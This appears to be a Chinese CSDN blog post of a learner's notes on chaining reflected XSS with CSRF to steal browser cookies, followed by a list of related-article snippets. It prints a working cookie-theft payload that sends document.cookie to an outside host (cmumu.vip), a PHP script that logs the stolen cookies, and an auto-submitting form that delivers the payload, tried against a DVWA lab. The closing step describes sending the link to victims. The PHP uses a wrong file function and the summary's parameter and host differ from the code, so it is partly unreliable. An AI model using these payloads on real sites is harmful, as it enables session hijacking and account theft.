XSS配合CSRF的利用 获取cookie

最新推荐文章于 2024-05-21 12:02:15 发布
最新推荐文章于 2024-05-21 12:02:15 发布
阅读量1k 收藏 5
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/95378706
版权

XSS配合CSRF的利用 获取cookie

今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。

主要就是围绕这句话展开的

<script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.cookie</script>

1.首先找到XSS漏洞,然后让它可以执行这句话。

2.document.location

这东西好像可以设置当前位置,你让它等于啥,网页就会跳转到哪。或者说它的值就是当前页面的URL。反正这东西可以用来页面跳转。具体的我也不知道,我也还没学JavaScript了。等以后学了再说吧。

3.创建flag.php

在自己的服务器上,创建一个flag.php的文件,来保存传过来的cookie,可能有点懵,但先往下看。

<?php
$cookie = $_GET["cookie"];
$log = open("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

4.document.cookie

这个是获取当前页面的cookie

5.执行

存在XSS漏洞的地方为,一个叫keyword的参数。所以我们就给它传参,让后把这个文件保存到自己的服务器上,命名为csrf.php.那么最后的链接就为 http://cmumu.vip/csrf.php 。

<html>
<script>
     function submit()
     {
         var form=document.getElementById("go");
		 form.submit();
	 }
</script>
        <body onload="submit()">
                <form id="go"  action="http://10.0.0.21/DVWA/vulnerabilities/xss_r/">
                        <input type="hidden" name="name" value="<script>document.location='http://cmumu.vip/flag.php?cookie='+document.cookie</script>">
                      
                </form>

        </body>
</html>

6.总结

把这个链接发给受害者,受害者点击,csrf.php的代码被执行,页面自动提交,页面跳转到127.0.0.1这个网站,并给存在XSS漏洞的keyword参数传递JavaScript代码,JavaScript被执行,页面再次跳转,访问自己早就设置好的flag页面,并且把自己的cookie传过来,然后flag页面接收cookie参数,并把它保存在自己设置好的文件里。

沐目_01
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
csrf怎么获取 其他网站cookie_关于CSRF我能想到些什么
weixin_35216188的博客
12-22 2512
其实期末周已经抽不出身写梳理文章了,但是刚好遇上了安全课的期末作业,也就顺势梳理一下web安全的一些些知识。本来是打算写csrfxss的,但是好像做完答辩ppt,为了把csrf这个安全问题给我自己讲清楚已经花了五十页 ,于是就把标题改了,之前看过一个美团技术团队关于xss的文章写的很好的链接在这里。 (ps:因为没有专门做过相关的工作,这篇文章讲的并不是很深很实践得到的东西,只...
ctf xss利用_Csrf+Xss组合拳
weixin_39865952的博客
12-12 343
各位大师傅,第一次在合天发文章,请多多关照今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难啊,难啊)0x01这个站是我疫情时候在线上网课的平台,本着对信息安全做贡献的目的下去做的这个渗透工作(咳咳,这个平台有个签到,每次签到我都在与大脑作斗争,最后争不过大脑,选择了睡觉,最后旷课太多,不搞要挂...
CSRF xss平台获得cookie
weixin_48266255的博客
08-10 424
CSRF xss平台获得cookie
网络空间安全:CSRFcookie的不解之缘
最新发布
oldxis的博客
05-21 364
往往会创建一个看似正常的网站,并在其中包含一些恶意的代码,在你兴致勃勃点击进去之后,在不知不觉中就利用浏览器自动发送包含cookie的请求,服务器一看“验证之后,服务器再根据你的身份信息来向你展示与你相关的信息,但是一般网站只需要登录一次,之后在属于这个网站的范围内进行操作的时候便。这一系列的流程,用到了黑客的网站与正常的网站。,并且可以在文件中附上能够修改操作的内容,配合脚本,就可以进行一些你不一定希望看到的操作。就发送给你一个值,这个值就代表了你,在后续进行网站的访问时,会自动。
简单的利用XSS获取用户cookie
shy的博客
10-25 4307
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
修改哪个请求头可以伪造请求ip_被忽视的漏洞CSRF跨站请求伪造
weixin_39862669的博客
11-23 784
人类才是最大的bug起因几天前,有位师傅联系我询问CSRF的事,最近也刚好在学习CSRF,就弄出一篇文章出来吧。01CSRF简介CSRF(跨站请求伪造),是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。02Cookie这里需要了解一个概念,cookie...
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
CSRF攻击则利用了用户浏览器的自动携带Cookie特性,攻击者诱使用户在不知情的情况下执行操作,如转账、更改密码等。防御CSRF通常需要采用令牌(Token)机制,确保每个请求都有一个唯一的、服务器端验证的令牌,防止...
详解XSSCSRF简述及预防措施
10-17
在Web安全领域中,XSS(跨站脚本攻击)和CSRF(跨站请求伪造)是最为常见的安全威胁之一。本文将详细解释这两种攻击方式,并提出相应的预防措施。 首先,让我们来详细了解XSS攻击。XSS,即Cross-Site Scripting的...
Web高级知识-跨域&XSS;&CSRF;解决方案
11-26
预防措施包括:输入验证、输出编码、使用HTTP-only Cookie防止Cookie被脚本读取,以及设置Content-Security-Policy响应头限制脚本来源。 【CSRF(Cross-site request forgery)攻击】CSRF攻击利用用户已登录的身份...
javascript实现获取cookie过期时间的变通方法
10-25
另外,过多的使用cookie可能会影响Web应用的性能,并且,由于Cookie存储在用户浏览器中,还可能会带来安全风险,例如跨站脚本攻击(XSS)和跨站请求伪造(CSRF)等。 总之,虽然直接获取cookie过期时间在客户端...
xss Cookie
10-09
1. **Cookie盗窃**:攻击者通过XSS脚本读取并发送用户的Cookie到攻击者的服务器,从而获取用户的身份信息。 2. **伪造Cookie**:攻击者可以设置新的Cookie,使用户在不知情的情况下携带攻击者设定的状态信息,如假冒...
新手教程:如何利用CSRF执行XSS攻击
kaitoulee
05-23 1486
我将拿出最近发生的一个例子,讲解如何将一些低级别的风险连接起来形成一个向量,然后达到攻击的目的。 背景介绍 首先介绍背景条件,我发现一个网站的用户资料页面上有一个持久性XSS漏洞。然而只能是用户修改自己的用户名,针对自己触发XSS。其它用户都不能遇到这个XSS攻击。 看起来难以利用,对不对?我们一般都会这样想,通常认为它只是一个风险,有时候会修复它,但是一般都不会,毕竟无法利用
使用xss来打cookie
weixin_60719780的博客
11-11 1091
在我们的xss平台上,我们就可以收到一条信息,这也就说明了我们成功拿到cookie值,里面包含了cookie值;下来我们就可以使用cookie值进行登录,无需密码验证,到这里是不是感觉很爽。这里我们使用安全等级低的来做,使用xss存储型,只要大家能够绕过安全的等级(后面我会将存储型的三个等级绕过方式整理出来)下来我们重新使用一个浏览器打开我们的dvwa靶机,找到检查,找到cookie,进行修改。2、这里面有许多模块,自己选择所需要的就行,这里我使用的是默认模块。成功用cookie登录。
CSRF之介绍及与XSS的结合学习笔记
热门推荐
Y4tacker的博客
06-21 1万+
文章目录CSRF同源策略 CSRF 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF。 CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 同源策略 同源策略,它是由Netscape提出的一个著名的安全策略。 现在所有支持Jav
XSS攻击(1), 测试XSS漏洞, 获取cookie
探测???
10-18 1627
XSS(Cross-Site Scripting), 跨站攻击脚本, XSS漏洞发生在前端, 依赖于浏览器的解析引擎, 让前端执行攻击代码. XSS其实也算注入类的攻击, XSS代码注入需要有JavaScript编程基础.XSS的原理就是开发者没有对输入内容进行过滤, 导致通过攻击者精心构造的前端代码, 输入后和原来的前端代码产生混淆, 形成新的页面语句, 并且新的页面代码能够被浏览器解析并输出.:如果受害者具有某些特权,例如网站管理员,攻击者可能会利用XSS漏洞,使用受害者的权限对网站进行未授权的修改。
网安入门17-XSS(打Cookie
m0_61499194的博客
02-27 717
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
了解cookie以及cookie跨站点伪造攻击(CSRF)
我的专栏
05-15 2748
背景知识: 很久很久以前,Web基本上就是文档的浏览而已,既然是浏览,作为服务器,不需要纪录谁在某一段时间里浏览了什么 文档,每次请求都是一个新的Http协议,就是请求加响应,尤其是我不用记住是谁刚刚发了HTTP请求,每个请求对我 来说是全新的,这段时间很嗨皮。 但是,随着交互式Web应用的兴起,像在线购物网站,需要登录的网站等等,马上就面临一个问题,那就是要管理回话, 必须记住那些人登录系统,那些人往自己的购物车中放商品,也就是说我必须把每个人区分开,这就是一个不小的挑战, 因为HTTP请求是无状态.
被问出花了的 CookieCSRF
javagty6778的博客
03-05 334
我们知道 http 是无状态的,也就是说用户登录后进行其他操作时服务端无法知道用户是否已登录。有机灵的小伙伴很快想到,把用户登录信息存起来后面的接口都带上不就可以了?但 Cookie 出现前浏览器端还没有本地存储方法,JS 中在强的变量也抵不过浏览器的一次刷新。就这样Cookie\color{red}{ Cookie }Cookie 亮相了。
HTTP长连接与短连接:跨域、XSSCSRF解决方案解析
本文将深入探讨Web开发中的高级概念,包括HTTP的长连接与短连接、HTTP协议的无状态性以及跨域、XSSCSRF等安全问题的解决方案。 首先,HTTP协议是基于TCP/IP协议栈的应用层协议,它利用TCP提供可靠性,IP负责网络...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值